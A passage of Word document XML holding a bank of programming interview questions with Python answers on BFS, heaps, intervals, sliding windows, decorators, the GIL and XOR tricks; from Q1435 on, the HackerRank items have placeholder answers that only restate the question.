        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1419. DSA coding: Binary Tree Level Order Traversal. Given the root of a binary tree, return the values grouped by level (breadth-first, left to right).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from collections import deque</w:t>
        <w:br/>
        <w:br/>
        <w:t>def levelOrder(root):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not root:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    queue = deque([root])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while queue:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        level = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for _ in range(len(queue)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            node = queue.popleft()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            level.append(node.val)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if node.left:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                queue.append(node.left)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if node.right:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                queue.append(node.right)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        result.append(level)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return result</w:t>
        <w:br/>
        <w:t>Standard BFS with a queue: snapshot the queue's current length before the inner loop so each iteration processes exactly one level's worth of nodes before moving to the next. O(n) time, O(n) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1420. DSA coding: Kth Largest Element in an Array. Given an integer array nums and an integer k, return the kth largest element (not the kth distinct element) without fully sorting the array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import heapq</w:t>
        <w:br/>
        <w:br/>
        <w:t>def findKthLargest(nums, k):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    heap = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for n in nums:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        heapq.heappush(heap, n)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if len(heap) &gt; k:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            heapq.heappop(heap)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return heap[0]</w:t>
        <w:br/>
        <w:t>Maintain a min-heap of size k: push every number, and whenever the heap exceeds size k, pop the smallest. After processing all numbers, the heap's smallest element (the root) is the kth largest overall. O(n log k) time, better than the O(n log n) full sort for small k.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1421. DSA coding: Linked List Cycle Detection. Given the head of a linked list, determine if it contains a cycle, without using extra space for a visited set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def hasCycle(head):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    slow = fast = head</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while fast and fast.next:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        slow = slow.next</w:t>
        <w:br/>
        <w:t xml:space="preserve">        fast = fast.next.next</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if slow is fast:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return False</w:t>
        <w:br/>
        <w:t>Floyd's cycle detection (tortoise and hare): the fast pointer moves twice as fast as the slow one. If there's a cycle, the fast pointer eventually laps the slow one and they meet inside the loop; if the list ends, fast hits None first. O(n) time, O(1) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1422. DSA coding: Merge Intervals. Given a list of intervals where intervals[i] = [start, end], merge all overlapping intervals and return the non-overlapping intervals that cover all the input ranges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def merge(intervals):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    intervals.sort(key=lambda x: x[0])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    merged = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for start, end in intervals:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if merged and start &lt;= merged[-1][1]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            merged[-1][1] = max(merged[-1][1], end)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            merged.append([start, end])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return merged</w:t>
        <w:br/>
        <w:t>Sort by start time first, then sweep once: if the current interval's start is &lt;= the last merged interval's end, they overlap, so extend the last interval's end; otherwise start a new interval. O(n log n) time, dominated by the sort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1423. DSA coding: Longest Substring Without Repeating Characters. Given a string s, find the length of the longest substring without repeating characters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def lengthOfLongestSubstring(s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    last_seen = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    start = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    best = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for i, c in enumerate(s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if c in last_seen and last_seen[c] &gt;= start:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            start = last_seen[c] + 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        last_seen[c] = i</w:t>
        <w:br/>
        <w:t xml:space="preserve">        best = max(best, i - start + 1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return best</w:t>
        <w:br/>
        <w:t>Sliding window: track the last index each character was seen at. When a repeat is found inside the current window, jump the window's start past the previous occurrence instead of shrinking it one step at a time. O(n) time, O(min(n, charset size)) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1424. Python coding: Implement a timing decorator that logs how long a function takes to run, while preserving the wrapped function's name and docstring for introspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import time</w:t>
        <w:br/>
        <w:t>import functools</w:t>
        <w:br/>
        <w:br/>
        <w:t>def timed(func):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    @functools.wraps(func)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def wrapper(*args, **kwargs):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        start = time.perf_counter()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return func(*args, **kwargs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        finally:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            elapsed = time.perf_counter() - start</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print(f"{func.__name__} took {elapsed:.4f}s")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return wrapper</w:t>
        <w:br/>
        <w:t>functools.wraps copies __name__, __doc__, and other metadata from the wrapped function onto the wrapper, so introspection, help(), and stack traces still show the original function's identity instead of "wrapper".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1425. Python coding: Write a generator that yields paginated API results lazily, without loading every page into memory up front.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def paginate(fetch_page):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    page = 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while True:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        items = fetch_page(page)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if not items:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return</w:t>
        <w:br/>
        <w:t xml:space="preserve">        yield from items</w:t>
        <w:br/>
        <w:t xml:space="preserve">        page += 1</w:t>
        <w:br/>
        <w:t>fetch_page(page) returns one page's items at a time; yield from streams them one at a time to the caller, and the generator stops as soon as a page comes back empty. Callers can iterate with a plain for loop instead of materializing every page into a list first, which matters when the API has thousands of pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1426. Python coding: Implement a context manager that acquires and releases a file lock, guaranteeing the lock is released even if an exception is raised inside the with block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from contextlib import contextmanager</w:t>
        <w:br/>
        <w:t>import fcntl</w:t>
        <w:br/>
        <w:br/>
        <w:t>@contextmanager</w:t>
        <w:br/>
        <w:t>def file_lock(path):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f = open(path, "w")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        fcntl.flock(f, fcntl.LOCK_EX)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        yield f</w:t>
        <w:br/>
        <w:t xml:space="preserve">    finally:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        fcntl.flock(f, fcntl.LOCK_UN)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.close()</w:t>
        <w:br/>
        <w:t>The try/finally wrapped around the yield guarantees the lock is released and the file closed even if the code inside the with block raises - Python still runs the finally block as the exception propagates back out through the generator-based context manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1427. Python coding: Explain and demonstrate why threads don't speed up CPU-bound work in CPython, and show the multiprocessing fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor</w:t>
        <w:br/>
        <w:br/>
        <w:t>def cpu_bound(n):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    total = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for i in range(n):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        total += i * i</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return total</w:t>
        <w:br/>
        <w:br/>
        <w:t># Threads: the GIL serializes bytecode execution, so this is not faster than sequential for CPU-bound work</w:t>
        <w:br/>
        <w:t>with ThreadPoolExecutor(max_workers=4) as ex:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    list(ex.map(cpu_bound, [10_000_000] * 4))</w:t>
        <w:br/>
        <w:br/>
        <w:t># Processes: each worker has its own interpreter and GIL, so this actually parallelizes across cores</w:t>
        <w:br/>
        <w:t>with ProcessPoolExecutor(max_workers=4) as ex:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    list(ex.map(cpu_bound, [10_000_000] * 4))</w:t>
        <w:br/>
        <w:t>The Global Interpreter Lock lets only one thread execute Python bytecode at a time, so ThreadPoolExecutor helps with I/O-bound work (threads release the GIL while blocked on I/O) but not CPU-bound work. ProcessPoolExecutor sidesteps the GIL entirely by running separate OS processes, each with its own interpreter, at the cost of inter-process serialization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1428. Today interview 2026-07-06 - Python coding equality: Write a function to compare two values using == and return the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def values_equal(a, b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return a == b</w:t>
        <w:br/>
        <w:br/>
        <w:t>This returns True when the two inputs are equal by value according to their type's __eq__ method, and False otherwise. For example, values_equal([1, 2], [1, 2]) returns True because the list values match, even though the two lists are separate objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1429. Today interview 2026-07-06 - Python coding identity output: Given a = [1, 2], b = [1, 2], and c = a, what do print(a == b), print(a is b), and print(a is c) output and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: a == b prints True because both lists contain the same values in the same order. a is b prints False because a and b are two different list objects in memory. a is c prints True because c references the exact same object as a. Interview shortcut: == means value equality; is means identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1430. Today interview 2026-07-06 - Python coding multiprocessing example: Write a small Python multiprocessing example using Process, start, and join.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from multiprocessing import Process</w:t>
        <w:br/>
        <w:br/>
        <w:t>def worker():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("Running")</w:t>
        <w:br/>
        <w:br/>
        <w:t>if __name__ == "__main__":</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p = Process(target=worker)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p.start()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p.join()</w:t>
        <w:br/>
        <w:br/>
        <w:t>Process creates a separate Python process, start begins execution, and join waits for that child process to finish. The if __name__ == "__main__" guard is important, especially on Windows and macOS spawn-based process starts, to prevent child processes from re-importing the module and recursively creating more processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1431. Anagram check: Write a program to check whether two strings are anagrams of each other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def is_anagram(a, b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    a, b = a.replace(" ", "").lower(), b.replace(" ", "").lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if len(a) != len(b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return sorted(a) == sorted(b)</w:t>
        <w:br/>
        <w:br/>
        <w:t>This is O(n log n) from the sort. An O(n) alternative uses a character-count dictionary (or a fixed-length array for a known alphabet): increment counts for string A, decrement for string B, and confirm every count returns to zero - this avoids the sort's log factor when both strings are large.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1432. Find the single unique element: Given an array where every element appears twice except one, write an optimized program to find the unique element.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from functools import reduce</w:t>
        <w:br/>
        <w:t>def find_unique(nums):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return reduce(lambda a, b: a ^ b, nums)</w:t>
        <w:br/>
        <w:br/>
        <w:t>XOR-ing every element together cancels out every value that appears exactly twice (x ^ x = 0) and leaves the single unique value, since XOR is commutative, associative, and order-independent. This runs in O(n) time and O(1) extra space, which beats a hashmap-count approach (O(n) time, O(n) space) or sort-then-scan (O(n log n) time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1433. Time complexity: What is the time and space complexity of your solution to find the single unique element, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The XOR solution is O(n) time because it makes a single linear pass over the array, XOR-ing each element into a running accumulator, and O(1) additional space because it only ever holds one integer accumulator regardless of input size - no auxiliary array, hashmap, or sorting buffer is needed. That makes it strictly better on both axes than a hashmap-frequency approach (O(n) time but O(n) space) or a sort-based approach (O(n log n) time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1434. XOR trick limitation: Why does the XOR trick fail to find the unique element when there are multiple non-duplicated elements instead of just one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: XOR-ing the whole array only isolates a single answer because every paired value cancels to zero, leaving exactly one survivor; if two or more elements are each unique (appear once), XOR-ing everything together produces the XOR of all those unique values combined, not any individual one of them, and that combined value generally can't be decomposed back into the originals without more information. Finding two unique elements requires a different technique: XOR the whole array to get combined_xor = unique1 ^ unique2, pick any set bit in that result to partition the array into two groups (elements with that bit set vs not), and XOR each group separately, since unique1 and unique2 must differ in at least one bit and therefore fall into different groups while every duplicate pair stays together in the same group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1435. HackerRank arrays - minimum swaps: Given a permutation of integers from 1 to n, implement minimum_swaps(arr) to return the minimum swaps required to sort it. Target O(n) time and explain cycle decomposition. Test cases: [4, 3, 1, 2] -&gt; 3; [1, 2, 3] -&gt; 0; [2, 1] -&gt; 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank arrays - minimum swaps: Given a permutation of integers from 1 to n, implement minimum_swaps(arr) to return the minimum swaps required to sort it. Target O(n) time and explain cycle decomposition. Test cases: [4, 3, 1, 2] -&gt; 3; [1, 2, 3] -&gt; 0; [2, 1] -&gt; 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1436. HackerRank arrays - array manipulation: You are given n zero-initialized elements and queries [left, right, value] that add value to every element in the inclusive range. Return the maximum value without updating every element of every range. Test cases: n=5, queries=[[1,2,100],[2,5,100],[3,4,100]] -&gt; 200; n=1, queries=[] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank arrays - array manipulation: You are given n zero-initialized elements and queries [left, right, value] that add value to every element in the inclusive range. Return the maximum value without updating every element of every range. Test cases: n=5, queries=[[1,2,100],[2,5,100],[3,4,100]] -&gt; 200; n=1, queries=[] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1437. HackerRank strings - Sherlock anagrams: Given a lowercase string, count unordered pairs of substrings that are anagrams. Define how you canonicalize substrings and analyze complexity. Test cases: 'abba' -&gt; 4; 'abcd' -&gt; 0; 'kkkk' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank strings - Sherlock anagrams: Given a lowercase string, count unordered pairs of substrings that are anagrams. Define how you canonicalize substrings and analyze complexity. Test cases: 'abba' -&gt; 4; 'abcd' -&gt; 0; 'kkkk' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1438. HackerRank strings - special palindrome: Count substrings whose characters are all identical, or identical except for one different middle character. Design a solution faster than checking every substring. Test cases: 'asasd' -&gt; 7; 'aaaa' -&gt; 10; 'abcbaba' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank strings - special palindrome: Count substrings whose characters are all identical, or identical except for one different middle character. Design a solution faster than checking every substring. Test cases: 'asasd' -&gt; 7; 'aaaa' -&gt; 10; 'abcbaba' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1439. HackerRank frequency queries: Process insert x, delete one occurrence of x, and check whether any value occurs exactly f times. Each operation should run in average O(1) time. Test case: [[1,5],[1,6],[3,2],[1,5],[1,5],[1,6],[2,5],[3,2]] -&gt; [0,1]. Deleting a missing value must not fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank frequency queries: Process insert x, delete one occurrence of x, and check whether any value occurs exactly f times. Each operation should run in average O(1) time. Test case: [[1,5],[1,6],[3,2],[1,5],[1,5],[1,6],[2,5],[3,2]] -&gt; [0,1]. Deleting a missing value must not fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1440. HackerRank greedy - luck balance: Each contest has a luck value and importance flag. You may lose at most k important contests. Return maximum achievable luck and justify the greedy choice. Test cases: k=3, contests=[[5,1],[2,1],[1,1],[8,1],[10,0],[5,0]] -&gt; 29; k=0, [[5,1],[10,0]] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank greedy - luck balance: Each contest has a luck value and importance flag. You may lose at most k important contests. Return maximum achievable luck and justify the greedy choice. Test cases: k=3, contests=[[5,1],[2,1],[1,1],[8,1],[10,0],[5,0]] -&gt; 29; k=0, [[5,1],[10,0]] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1441. HackerRank sorting - fraudulent activity notifications: Given expenditures and trailing window d, count days where today's value is at least twice the median of the previous d days. Avoid sorting the full window each day. Test cases: [2,3,4,2,3,6,8,4,5], d=5 -&gt; 2; [1,2,3,4,4], d=4 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank sorting - fraudulent activity notifications: Given expenditures and trailing window d, count days where today's value is at least twice the median of the previous d days. Avoid sorting the full window each day. Test cases: [2,3,4,2,3,6,8,4,5], d=5 -&gt; 2; [1,2,3,4,4], d=4 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1442. HackerRank stack - largest rectangle: Given histogram heights, return the largest rectangular area from consecutive bars using an O(n) monotonic stack. Test cases: [1,2,3,4,5] -&gt; 9; [2,1,5,6,2,3] -&gt; 10; [] -&gt; 0; [5] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank stack - largest rectangle: Given histogram heights, return the largest rectangular area from consecutive bars using an O(n) monotonic stack. Test cases: [1,2,3,4,5] -&gt; 9; [2,1,5,6,2,3] -&gt; 10; [] -&gt; 0; [5] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1443. HackerRank stack - balanced brackets with errors: Validate nested (), [], and {} and return the zero-based index of the first invalid character, or -1 when valid. If opening brackets remain, return the index of the earliest unmatched opener. Test cases: '{[()]}' -&gt; -1; '{[(])}' -&gt; 3; '(()' -&gt; 0; ']' -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
